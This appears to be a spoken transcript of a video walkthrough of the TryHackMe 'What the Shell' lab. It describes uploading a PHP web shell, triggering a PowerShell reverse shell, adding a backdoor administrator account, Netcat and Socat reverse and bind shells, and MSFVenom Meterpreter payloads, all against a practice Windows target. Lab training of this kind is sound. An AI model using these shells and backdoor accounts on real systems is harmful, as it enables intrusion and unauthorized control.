What's going on? Today we're doing What the Shell room from TryHackMe. What the Shell is part of the complete beginner pathway, and it is for those who are starting out in pen testing and want to master the subject of the shell. So they want to understand what is shell, what are the types of shell, reverse shell, bind shell, and also get introduced to the kinds and types of the shells, including Socat, Netcat, Metasploit, MSFVenom, multi-handler web shells. We will discuss all of them in this scenario. So basically, you have around 15 tasks, but it is not timely sound to go over all of these tasks separately. So what I'm gonna do, I'm gonna launch the uh, practice box here and demonstrate the concept of the shells, explain them while the using one of these boxes. So basically, we first start with the Windows practice box, deploy the machine, and so deploy the machine. And as you can see, when we access the IP, we have a web page where we get to upload files. And also, I can connect to the machine using X FreeRDP in order to perform the tasks. So basically, our aim here is to understand the subject of the shells and go over all of the types of shell in a Windows environment. So if I get back to the uh, Windows here, so we have task 13. In task 13, it guides you how to go over the shells. So basically, for Windows, you start from here. Okay, so in the first scenario, upload a web shell on the Windows target and try to obtain a reverse shell using PowerShell. So here, in this scenario, suppose that you have a page and you are uploading files and the target system is Windows. You want to get a reverse shell back to your machine. So what is the first step that you would do? The first step is to upload a shell or a web shell to the Windows server. So it's the kind of shell that we upload and execute inside a web server. It is called a web shell. So let's create a simple web shell. So here we can say nano shell, a simple web shell, say PHP echo, and we will use the tag pre just to make sure that the output is displayed correctly when we upload that to the web server. Shell, we use the shell execute function to execute commands on the web server. So get, and we will retrieve the CMD parameter as a get request. And then you have to close the pre-parameter, double quotes, semicolon, and close the PHP tag file. So next we will upload that to the target, browse, TryHackMe, submit. File uploaded successfully. So here we assume that there are no firewall filters. It's not the subject of this room to discuss whether this shell gets past the firewalls or not. Here we aim to explain the concept of shells. So basically we uploaded a basic web shell. Now what's the next step? Next step is to navigate to that shell. So here we go to uploads shell.php. So that's not enough. We have to induce the CMD parameter we introduced in the shell. So CMD equal. Here we have to put a code that connects back to our machine. So we go back to my machine and we have to establish some sort of listener. So nc-lvp 4545. Now we will wait for the shell to connect back to us from the web server. So what we can do, we can use a PowerShell code to connect back to our machine. Since we are talking about Windows, so we can use the following PowerShell code. Let's go up, see where it is. All right, this one seems good, so we can take this one-liner, copy that, and then we can modify on this. So paste it here. So what we have to do, we have to modify the IP address and the port. If config, that will be my IP address, and the port is set correct. Now what we have to do next, we have to take this code or one-liner and encode it with a URL encoder, because we will use that in the web server or the URL. So basically we can use some sort of URL decoders. Let me check here, what do I have? So toolbox. Actually, I don't want to spend my lifetime looking for tools, so I'm going to go to URL encoder. So that's the equivalent one-liner for a browser to understand. Now we get back here, go to the browser, and put this right here. Execute. As you can see, we received the first shell. That's one kind of shell. So this is called reverse shells. You let the machine connect back to you. And as you can see now, we can execute command who am I, net authority system, and then we can do the various kinds of commands. So that's one kind of shells, web shells or reverse web shells. Now let's cancel that and go back to TryHackMe to see what is also we can do. The web server is running with system privileges. Create a new user and add it to the administrators group, then log in over RDP or WinRM. So basically here, why we are doing this? Let me get back and restore the shell. Most of the shells are not interactive. Non-interactive shells are hard to deal with, especially when you want to use autocomplete, tab autocomplete, or the arrow keys. So at the end, your aim is to log in normally to your target using RDP, SSH, or whatsoever. Since we have an established foothold on the Windows system, thanks to the web shell, we aim to elevate the access to a fully fledged shell. Fully fledged shell can only be accomplished using either an SSH or RDP. So we aim to use, because since this is a Windows machine, we aim to use RDP. So in order to use RDP normally, we have to add our own user. So who am I again? Okay, now to add your own user, we can type net user, say my name, and then password, also my name, /add. And then we add this user to the administrator group, net local group, administrators, my name, /add. Now we have added my user. Let me close this RDP session. Okay. And now let me try to log in to the Windows machine normally like any other user. So let me close this one and take this to the right. So on the Windows box, on my machine here, I will connect to the Windows box using xFreeRDP dynamic resolution, and we'll enable the clipboard, ignore the cert, and then put the IP address of the machine, which is 10.10.98.40/u, my name /p. Let's see. So that's a typical way to escalate your access from a regular non-interactive web shell or reverse shell into a fully fledged shell. As you can see, I have added my username and now I am logged into the machine. All right, next one. Next, we play with Socat shells. Experiment using Socat and Netcat to obtain reverse and bind shells on the Windows target. So as you know, we have web shells, I know that, but also we can execute shells using Netcat and Socat. As you know, Netcat is widely used by pen testers. Socat is also widely used, but Socat is kind of more troublesome to handle because in Linux it doesn't come pre-installed and you have to install it manually. The same in Windows. So let's now go over Socat and Netcat and how we can use them to create reverse shells or bind shells. So once you have your listener set up in your machine, now you can connect back to your machine by issuing netcat command on the target machine. So nc and your IP address, what's that? If config okay, 124. The port that we are using for the listener, which is 4545. And then we use -e to execute some sort of, or to execute CMD. Connect. As you can see on the left, we received the connection from the Windows host. That's a reverse shell. That's netcat reverse shell. Now let's see what happens if you want to use bind shell, bind. The bind shell, it's the other way around. The listener is on the attacker, the listener is on the victim machine, and the connect is on your machine. So basically, you would just switch the roles, cancel the connection here, cancel the connection here. So basically, what you would do in the bind shell on the target machine, you would establish the listener nc-lvmp, say 4545, and then -e cmd.exe. Listen. So now we connect to the machine from the attacker machine, which is my machine. nc the IP address is this one, and say 4545. Now we should be able to receive the connection. As you can see, again, we received the connection. The difference between bind and reverse is in bind, you connect to the machine. In reverse, you let the machine connect to you. And the reverse shell is more widely used than bind because it doesn't require any firewall bypass, right? In bind, you should be should open the port 4545, or should make sure that the port is not blocked by the firewall for the bind shell to work. That is the netcat reverse and the bind shell. Let's see now the Socat reverse shells. Socat and bind reverse shells. Let's cancel this one and cancel this one. What about Socat? Let's go down and see what do we have for Socats. So for Socats, more generally, they are more stable than Netcat, and preferably if you can do Socat, just do Socat. So you have for Linux and you have for Windows. So basically, let's see now a reverse shell for Socat reverse shell. So a reverse shell requires us to establish the listener on my machine, right? The machine that is the attacking machine. So take this one on my machine. So here the port will be 4545 and enter. Now, next, let's take this one, change on it, and execute that on the target machine. So now I am the listener, right? I'm listening for the incoming connections. So this is kind of bind shell, not reverse shell, because I am listening and the victim or the target will connect to me. So here, just grab the IP of your machine, port. Here we execute the PowerShell and use pipes to make it look like Linux. So go here, paste that, check back on your listener. Now execute. Let's see if Socat will work. I think the machine is stuck. Enter. Nothing yet. I think we need to do some changes on that. It didn't work. So here, let's check back. For the listener, I think let's take this part only. The port will be 4545. Okay. And now here it is not working. All right. So for the, let's connect now. To connect, let me take all right, this part is okay. Let's connect using this part. The same way, the same command actually. Paste, enter. Let's see if we receive something, and indeed we received something now. That is Socat bind shell. I'm letting the target connect to me. Now what if I want to use Socat reverse shell? So reverse shell, the listener will be on the target machine. So here we will take this command and put it here. Listen for incoming connections, and the same way take this one and connect. This way we are, oh, connection refused. Oh, okay. Have changed the IP to the the IP of the target. So we change the IP and we try to connect. PowerShell, no such file or directory. I think I missed, I confused some stuff. So basically, this one, the listener, wait. So previously what we did, we established the, here we connected to my machine, as I can see, to my machine, right? So this is the reverse shell. The reverse shell, yes, the reverse shell is when you let the machine connect to you. Now, if I want to connect the machine, it is the other way around, the bind shell. So here is the Socat reverse shell. Now, what I'm going to do is to do the bind shell. The bind shell, the listener will be run on the target machine. So let's see the commands. A listener, that is a listener. Let's configure the listener. So the port will be 4545, and here we execute the listener on the target machine. Now it's listening for the incoming connections. Now let's connect to that. Let's use this one. Yeah, since we okay, so let's remove this part since we put this part in the listener command. So I'm gonna remove this part. Okay, 4545, and then connect. Target IP is correct. So now it worked. So basically this is the bind shell. I connect with the machine. Okay, so that's both parts or both types for bind and reverse Socat reverse shells. Let's see what else we have to do on this machine. So we did the web shells, we did the Socat and Netcat shells. Now we will do the Meterpreter shells. Create a 64-bit Windows Meterpreter shell using MSFVenom and upload that to the Windows target. Activate the shell and catch it with multi-handler. Experiment with the features of the shell. And lastly, create both staged and stageless Meterpreters for either targets. Okay, let's create one now using Meterpreter. A Meterpreter reverse shell. So, for that we will use MSFVenom, sudo MSFVenom -b. The target is Windows, it's x64, and it is Meterpreter shell, Meterpreter reverse TCP. The file will be executable file, and the output will be shell.exe. lhost equal your IP address. lports equal 4545, and run. So here we are creating Meterpreter shell using MSFVenom. So far you have learned the web shells, you've learned the Socat shells, Netcat shells. Now we will learn more about the MSFVenom shells or Meterpreter shells. So here we need this file. Let's go to the browser and upload this file. Or instead of uploading, we can just copy that. Since we have an established RDB session, we can take advantage of this. Copy that and paste it in desktop. Again, this is only for experimentation. Don't bother for the ability to copy and paste. Permissions, no, do you have permissions, you don't have permissions. Don't bother thinking about this. This is only for the demonstration of reverse shells or bind shells. So now, before running this, we have to launch Metasploit and the multi-handler module, MSF console. So we use that to create the listener. And this is, by the way, reverse shell, not bind shell. Okay, use multi-handler set lhost set L port. What was the L port? Do you remember? 4545. 4545. Set payload. Now the payload has to be the same one you choose when you created the shell using MSFVenom. It was, let's copy it from here. Windows, okay. Run. Now you are up and running. Just execute the payload. As you can see, we received the reversal, which is Meterpreter reversal. Now you can do the various kind of commands to interact with the targets. So that is for Meterpreter shells. What's next? Create both staged and stageless Meterpreter shells for either target. Upload and manually activate them. Catching the shell with Netcat does this work. So what's the difference between staged and stageless? So if you go back to the command with MSFVenom, you will see that we have created staged reversal. Staged reverse shells are the shells that are more stable and more recommended to use to bypass firewalls, because part of the payload is executed first and the other part will be executed after the machine connects to you, thus bypassing the firewalls. Probably bypassing the firewalls, let me say. But staged or stageless reverse shells are denoted by underscores. So a stageless version would be, let's experiment a stageless one. Create one that is stageless. Yeah, keep this here. Okay. A stageless one, let's copy this, the whole command. So, instead of Meterpreter, I will use x64 shell reverse TCP. The stageless is denoted by underscores between the words. This is stageless reverse shell. Now, let's hit enter to create it. And now let's copy the resultant payload. Let's delete this one. Now, how to catch this? The question is asking, can you catch this using Netcat? Let's try. nc-lvp 4545. Execute. And indeed, you can do it. You don't need to use the multi-handler module in Metasploit if you are using stageless reverse shells. You can catch the stageless reverse shells with normal Netcat listener. All right, that's for Windows. So you have seen how to create reverse and bind shells for Windows using MSFVenom, Metasploit, Meterpreter, web shells, Netcat, Socat, and PowerShell. Most probably, if you are dealing with, or if you are not creating the, if you don't have the chance to create the shells using Netcat and Socat, most probably you will have to use web shells, which means you have to rely on PowerShell, as we saw earlier. Close the Windows one. Let's see now how you can do that for the Linux. Linux is easier actually. Just go, I'm gonna leave this to you. Go through the same process from here until, okay. Use Socat and Netcat, the same commands work, except for the web shell. For the web shell, you have to use PHP reverse shell and upload it manually, as we did when we uploaded the our own shell, right? So here you use the PHP reverse shell for the web shell, and then you can do the same for Socat and Netcat and the MSFVenom. Just change the target from Windows to Linux. So that was for today. I hope you enjoyed the video and see you later.